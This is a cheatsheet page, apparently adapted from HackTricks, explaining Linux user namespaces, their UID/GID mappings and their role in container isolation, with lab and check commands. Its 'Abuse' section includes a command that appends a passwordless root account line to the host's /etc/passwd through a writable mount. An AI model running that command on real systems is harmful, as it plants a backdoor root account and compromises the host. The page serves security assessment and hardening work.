daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

user-namespace.md (9732B)


      1 ---
      2 title: "User Namespace"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/namespaces/user-namespace.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/namespaces/user-namespace.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # User Namespace
     14 
     15 ## Overview
     16 
     17 The user namespace changes the meaning of user and group IDs by letting the kernel map IDs seen inside the namespace to different IDs outside it. This is one of the most important modern container protections because it directly addresses the biggest historical problem in classic containers: **root inside the container used to be uncomfortably close to root on the host**. <sup>[[1]](#references)</sup>
     18 
     19 With user namespaces, a process may run as UID 0 inside the container and still correspond to an unprivileged UID range on the host. That means the process can behave like root for many in-container tasks while being much less powerful from the host's point of view. This does not solve every container security problem, but it changes the consequences of a container compromise significantly.
     20 
     21 ## Operation
     22 
     23 A user namespace has mapping files such as `/proc/self/uid_map` and `/proc/self/gid_map` that describe how namespace IDs translate to parent IDs. If root inside the namespace maps to an unprivileged host UID, then operations that would require real host root simply do not carry the same weight. This is why user namespaces are central to **rootless containers** and why they are one of the biggest differences between older rootful container defaults and more modern least-privilege designs. <sup>[[1]](#references)</sup>
     24 
     25 The point is subtle but crucial: root inside the container is not eliminated, it is **translated**. The process still experiences a root-like environment locally, but the host should not be treating it as full root.
     26 
     27 ## Lab
     28 
     29 A manual test is:
     30 
     31 ```bash
     32 unshare --user --map-root-user --fork bash
     33 id
     34 cat /proc/self/uid_map
     35 cat /proc/self/gid_map
     36 ```
     37 
     38 This makes the current user appear as root inside the namespace while still not being host root outside it. It is one of the best simple demos for understanding why user namespaces are so valuable.
     39 
     40 In containers, you can compare the visible mapping with:
     41 
     42 ```bash
     43 docker run --rm debian:stable-slim sh -c 'id && cat /proc/self/uid_map'
     44 ```
     45 
     46 The exact output depends on whether the engine is using user namespace remapping or a more traditional rootful configuration.
     47 
     48 You can also read the mapping from the host side with:
     49 
     50 ```bash
     51 cat /proc/<pid>/uid_map
     52 cat /proc/<pid>/gid_map
     53 ```
     54 
     55 ## Runtime Usage
     56 
     57 Rootless Podman is one of the clearest examples of user namespaces being treated as a first-class security mechanism. Rootless Docker also depends on them. Docker's `userns-remap` support improves safety in rootful daemon deployments too, although many deployments leave it disabled for compatibility reasons. Kubernetes can create a user namespace for a Pod when `hostUsers: false` is supported and enabled, but adoption and defaults still vary by runtime, distribution, and cluster policy. Incus and LXC systems also rely heavily on UID/GID shifting and id-mapping concepts. <sup>[[2]](#references)</sup> <sup>[[3]](#references)</sup> <sup>[[4]](#references)</sup>
     58 
     59 The general trend is clear: environments that use user namespaces seriously usually provide a better answer to "what does container root actually mean?" than environments that do not.
     60 
     61 ## Advanced Mapping Details
     62 
     63 When an unprivileged process writes to `uid_map` or `gid_map`, the kernel applies stricter rules than it does for a privileged parent namespace writer. Only limited mappings are allowed, and for `gid_map` the writer usually needs to disable `setgroups(2)` first:
     64 
     65 ```bash
     66 cat /proc/self/setgroups
     67 echo deny > /proc/self/setgroups
     68 ```
     69 
     70 This detail matters because it explains why user-namespace setup sometimes fails in rootless experiments and why runtimes need careful helper logic around UID/GID delegation.
     71 
     72 Another advanced feature is the **ID-mapped mount**. Instead of changing on-disk ownership, an ID-mapped mount applies a user-namespace mapping to a mount so that ownership appears translated through that mount view. This is especially relevant in rootless and modern runtime setups because it allows shared host paths to be used without recursive `chown` operations. Security-wise, the feature changes how writable a bind mount appears from inside the namespace, even though it does not rewrite the underlying filesystem metadata.
     73 
     74 Finally, remember that when a process creates or enters a new user namespace, it receives a full capability set **inside that namespace**. That does not mean it suddenly gained host-global power. It means those capabilities can be used only where the namespace model and other protections allow them. This is the reason `unshare -U` can suddenly make mounting or namespace-local privileged operations possible without directly making the host root boundary disappear.
     75 
     76 ## Misconfigurations
     77 
     78 The major weakness is simply not using user namespaces in environments where they would be feasible. If container root maps too directly to host root, writable host mounts and privileged kernel operations become much more dangerous. Another problem is forcing host user namespace sharing or disabling remapping for compatibility without recognizing how much that changes the trust boundary.
     79 
     80 User namespaces also need to be considered together with the rest of the model. Even when they are active, a broad runtime API exposure or a very weak runtime configuration can still allow privilege escalation through other paths. But without them, many old breakout classes become much easier to exploit.
     81 
     82 ## Abuse
     83 
     84 If the container is rootful without user namespace separation, a writable host bind mount becomes vastly more dangerous because the process may really be writing as host root. Dangerous capabilities likewise become more meaningful. The attacker no longer needs to fight as hard against the translation boundary because the translation boundary barely exists.
     85 
     86 User namespace presence or absence should be checked early when evaluating a container breakout path. It does not answer every question, but it immediately shows whether "root in container" has direct host relevance.
     87 
     88 The most practical abuse pattern is to confirm the mapping and then immediately test whether host-mounted content is writable with host-relevant privileges:
     89 
     90 ```bash
     91 id
     92 cat /proc/self/uid_map
     93 cat /proc/self/gid_map
     94 touch /host/tmp/userns_test 2>/dev/null && echo "host write works"
     95 ls -ln /host/tmp/userns_test 2>/dev/null
     96 ```
     97 
     98 If the file is created as real host root, user namespace isolation is effectively absent for that path. At that point, classic host-file abuses become realistic:
     99 
    100 ```bash
    101 echo 'x:x:0:0:x:/root:/bin/bash' >> /host/etc/passwd 2>/dev/null || echo "passwd write blocked"
    102 cat /host/etc/passwd | tail
    103 ```
    104 
    105 A safer confirmation on a live assessment is to write a benign marker instead of modifying critical files:
    106 
    107 ```bash
    108 echo test > /host/root/userns_marker 2>/dev/null
    109 ls -l /host/root/userns_marker 2>/dev/null
    110 ```
    111 
    112 These checks matter because they answer the real question fast: does root in this container map closely enough to host root that a writable host mount immediately becomes a host compromise path?
    113 
    114 ### Full Example: Regaining Namespace-Local Capabilities
    115 
    116 If seccomp allows `unshare` and the environment permits a fresh user namespace, the process may regain a full capability set inside that new namespace:
    117 
    118 ```bash
    119 unshare -UrmCpf bash
    120 grep CapEff /proc/self/status
    121 mount -t tmpfs tmpfs /mnt 2>/dev/null && echo "namespace-local mount works"
    122 ```
    123 
    124 This is not by itself a host escape. The reason it matters is that user namespaces can re-enable privileged namespace-local actions that later combine with weak mounts, vulnerable kernels, or badly exposed runtime surfaces.
    125 
    126 ## Checks
    127 
    128 These commands are meant to answer the most important question in this page: what does root inside this container map to on the host?
    129 
    130 ```bash
    131 readlink /proc/self/ns/user   # User namespace identifier
    132 id                            # Current UID/GID as seen inside the container
    133 cat /proc/self/uid_map        # UID translation to parent namespace
    134 cat /proc/self/gid_map        # GID translation to parent namespace
    135 cat /proc/self/setgroups 2>/dev/null   # GID-mapping restrictions for unprivileged writers
    136 ```
    137 
    138 What is interesting here:
    139 
    140 - If the process is UID 0 and the maps show a direct or very close host-root mapping, the container is much more dangerous.
    141 - If root maps to an unprivileged host range, that is a much safer baseline and usually indicates real user namespace isolation.
    142 - The mapping files are more valuable than `id` alone, because `id` only shows the namespace-local identity.
    143 
    144 If the workload runs as UID 0 and the mapping shows that this corresponds closely to host root, you should interpret the rest of the container's privileges much more strictly.
    145 
    146 ## References
    147 
    148 - [1] [`user_namespaces(7)` - Linux manual page](https://man7.org/linux/man-pages/man7/user_namespaces.7.html)
    149 - [2] [Docker Docs - Isolate containers with a user namespace](https://docs.docker.com/engine/security/userns-remap/)
    150 - [3] [Kubernetes Documentation - User namespaces](https://kubernetes.io/docs/concepts/workloads/pods/user-namespaces/)
    151 - [4] [Incus documentation - Security and unprivileged containers](https://linuxcontainers.org/incus/docs/main/explanation/security/)